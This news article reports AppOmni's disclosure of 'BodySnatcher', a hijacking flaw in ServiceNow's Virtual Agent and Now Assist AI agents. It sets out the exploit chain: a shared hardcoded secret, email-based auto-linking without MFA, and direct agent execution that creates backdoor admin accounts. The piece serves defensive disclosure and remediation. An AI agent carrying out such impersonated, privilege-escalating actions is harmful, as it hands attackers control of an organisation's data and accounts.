The emergence of agentic AI presents new security challenges because it lets loose multiple autonomous agents to act on behalf of humans. Once an AI agent is trusted to execute workflows or make decisions autonomously, any misconfigured permission, shared credential, or flawed linking mechanism can turn an AI agent into a proxy for attackers, capable of performing real actions at machine scale.
That was evident when Aaron Costello, Chief of Security Research at AppOmni, a SaaS security firm, discovered a critical agentic hijacking vulnerability, known as BodySnatcher, in ServiceNow’s Virtual Agent API and the Now Assist AI Agents application. According to Costello, “AI agents significantly amplify the impact of traditional security flaws.”
“BodySnatcher represents the most severe AI-driven security vulnerability uncovered to date and a defining example of agentic AI security vulnerabilities in modern SaaS platforms.”
The exploit “demonstrates how an attacker can effectively ‘remote control’ an organization’s AI, weaponizing the tools meant to simplify enterprise workflows,” Costello added.
“This finding is particularly significant given the scale of the risk; ServiceNow’s Now Assist and Virtual Agent applications are utilized by nearly half of AppOmni’s Fortune 100 customers.”
What caused the vulnerability, and how can enterprises avoid such exploits in their systems?
How a Single Integration Let Attackers Impersonate Any ServiceNow User
A specific integration between the Virtual Agent API and Now Assist allowed unauthenticated attackers to impersonate any ServiceNow user using only an email address, bypassing multi-factor authentication (MFA), single sign-on (SSO) and other access controls.
By chaining a hardcoded, platform-wide secret with account-linking logic that trusts a simple email address, an attacker would be able to impersonate an administrator and execute an AI agent to override security controls and create backdoor accounts with full privileges.
“Insecure configurations transformed a standard natural language understanding (NLU) chatbot into a silent launchpad for malicious AI agent execution,” according to Costello.
“This could grant nearly unlimited access to everything an organization houses, such as customer Social Security numbers, healthcare information, financial records, or confidential intellectual property.”
The vulnerability affected ServiceNow instances running Now Assist AI Agents (sn_aia) versions 5.0.24 through 5.1.17 and Virtual Agent API (sn_va_as_service) <= 3.15.1 and 4.0.0 – 4.0.3.
AppOmni reported the vulnerability to ServiceNow on October 23, 2025 and the vendor immediately acknowledged receipt of vulnerability. On October 30, ServiceNow fixed the vulnerability and emailed customers to inform them of the vulnerability. It also released a knowledge base article crediting Costello and AppOmni. The company stated this week:
“ServiceNow addressed this vulnerability by deploying a relevant security update to the majority of hosted instances. Security updates were also provided to ServiceNow partners and self-hosted customers. Additionally, the vulnerability is addressed in the listed Store App versions.”
How Virtual Agent Normally Keeps Things Safe
Virtual Agent is ServiceNow’s enterprise chatbot engine, built to simplify everyday tasks inside large organizations. It uses NLU to give users a conversational way to interact with the system’s underlying data and services.
Employees can ask a chatbot to reset a password, order equipment, or file a support ticket, and each request is routed to a predefined workflow known as a “topic.” These topics can only perform actions explicitly allowed by developers, which is why Virtual Agent has long been viewed as relatively low risk.
The Virtual Agent API extends this system beyond ServiceNow’s web interface, allowing external platforms like Slack or Microsoft Teams to send messages into the same topic framework. In that way, users can interact with the system without needing to log in to ServiceNow directly.
Rather than exposing separate endpoints for each integration, ServiceNow uses a shared API and distinguishes callers using “providers” and “channels.” Each provider defines how requests are authenticated and how an external user is linked to a ServiceNow account.
For authentication, many providers rely on Message Auth, which uses a static secret tied to the integration rather than a specific user. To determine who the user is, providers can enable a feature called auto-linking, which associates an external identity with a ServiceNow account. Once linked, all actions run with that user’s permissions.
Configuration Choices That Opened the Door
The vulnerability emerged when ServiceNow introduced new providers for its Now Assist AI Agents to extend the capabilities of the Virtual Agent API beyond bot-to-bot use cases to support bot-to-agent or agent-to-agent (A2A) interactions.
As each integration uses its own provider within ServiceNow to define how incoming messages are authenticated, the vendor removed the need to create new API endpoints for each integration. As Costello noted:
“It’s reasonable to assume ServiceNow chose this approach to provide a more seamless experience for end users, fully leveraging the transparent nature of auto-linking.”
These providers reused the same Message Auth and auto-linking mechanisms, but with critical flaws.
The providers “shipped with the exact same secret across all ServiceNow instances. This meant anyone who knew or obtained the token could interact with the Virtual Agent API of any customer environment where these providers were active,” according to Costello.
Worse, the auto-linking logic trusted any request that presented this shared secret, without multi-factor authentication. An attacker only needed a valid email address to be linked to that user’s ServiceNow account. From that point on, Virtual Agent treated the attacker as the impersonated user.
At first, the security risk appeared to be limited. Messages were asynchronous, and responses were routed to predefined endpoints the attacker couldn’t control.
“Nevertheless, the token provided a universal, instance-agnostic authentication bypass that should never have existed at all,” Costello pointed out.
And it became clear that the potential for exploitation was far more serious.
To support agent-to-agent communication, ServiceNow added an A2A Scripted REST API that converts requests into Virtual Agent messages and injects them directly into the execution queue. If an AI agent is active and the caller has sufficient permissions, it can be executed directly, even outside expected channels.
By combining user impersonation with ServiceNow’s shipped AI agents, attackers could escalate quickly.
At the time of discovery, one of the built-in AI agents was capable of creating records in arbitrary database tables. Executed under an impersonated admin account, it could create a new user, assign the admin role, reset the password, and grant full access—all without ever logging in as a real user.
“With respect to what was publicly understood regarding the availability of AI agents on the platform, this understanding is groundbreaking,” according to Costello.
“The general consensus was that in order for an AI agent to be executed outside of testing, it must be deployed to a channel that has explicitly enabled the Now Assist feature. But this is not the case. Evidently, as long as the agent is in an active state, and the calling user has the necessary permissions, it can be executed directly through these topics.”
Once an attacker could impersonate a user and invoke autonomous AI agents, Virtual Agent’s original guardrails no longer mattered.
How to Lock It Down: Practical Security Best Practices for Agentic AI Systems
ServiceNow patched the BodySnatcher exploit by rotating the provider credentials and removing the Record Management AI agent used in the PoC.
The vendor stated:
“At this time, ServiceNow is unaware of this issue being exploited in the wild against customer instances. However, due to the potential for increased risk when vulnerabilities are publicly disclosed, we recommend that… customers promptly apply an appropriate security update or upgrade if they have not already done so.”
But Costello noted that “point-in-time fixes do not eliminate systemic risk from insecure provider and agent configurations.” The configuration choices that led to this vulnerability in ServiceNow “could still exist in an organization’s custom code or third-party solutions.”
“Rather than merely disrupting the exploit at a single stage, a more resilient strategy involves addressing the fundamental configuration choices that enabled it in the first place.”
Costello recommends that ServiceNow customers using its on-premise product “should immediately upgrade to, at minimum, the earliest fixed version of each affected application to secure their environment.” Cloud-hosted customers do not need to take action.
To prevent the abuse of agentic AI in conversational channels, Costello outlines three best practices that security teams and platform administrators should follow:
- Requiring strong provider configuration controls, including enforced MFA for account linking
- Establishing an automated agent approval process
- Disabling unused and inactive agents
“Had MFA been a default requirement for these AI agent providers during the account-linking process, the BodySnatcher exploit chain would have been broken at the impersonation stage.”
ServiceNow provides customers with the flexibility to enforce MFA for any provider. Software-based authenticators are preferable to text messages, given the rising risk of targeted SMS phishing and SIM-swapping attacks, Costello noted.
And although ServiceNow removed the Record Management AI agent from customer environments, developers can still build powerful custom AI agents on the platform. It’s important to implement an automatic approval process using ServiceNow’s AI Control Tower application.
And, as active agent can be susceptible to potential abuse, even if it is not deployed to any bot or channel, active agents that have not been used for more than 90 days should be deactivated or deleted, Costello added.
“By implementing a regular auditing cadence for agents, organizations can reduce the blast radius of an attack.”
Agentic AI Raises the Stakes for Enterprise Security
The discovery of BodySnatcher demonstrates how an attacker can effectively ‘remote control’ an organization’s AI, weaponizing the tools meant to simplify enterprise workflows. None of this required clever prompt injection. The vulnerability came from traditional issues like shared secrets, over-trusting auto-linking logic and assumptions about how systems would be used. Costello stated:
“These findings together confirm a troubling trend, AI agents are becoming more powerful and being built to handle more than just basic tasks.”
The deployment of AI agents emphasizes the importance of identity and trust controls. A chatbot that can only answer questions is one thing. An AI agent that can create users, assign roles, or modify records is something else entirely.
The incident is a reminder for anyone deploying AI agents inside enterprise systems that automation doesn’t reduce risk by default. If anything, it raises the stakes when old security shortcuts are left in place.
“[T]his exploit is not an isolated incident. It builds upon my previous research into ServiceNow’s Agent-to-Agent discovery mechanism, which detailed how attackers can trick AI agents into recruiting more powerful AI agents to fulfil a malicious task.”
“This shift means that without hard guardrails, an agent’s power is directly proportional to the risk it poses to the platform, creating fertile ground for vulnerabilities and misconfigurations.”
It’s clear that while automated defenses are critical, security teams and platform administrators still need to have a clear understanding of how SaaS security and AI security have converged.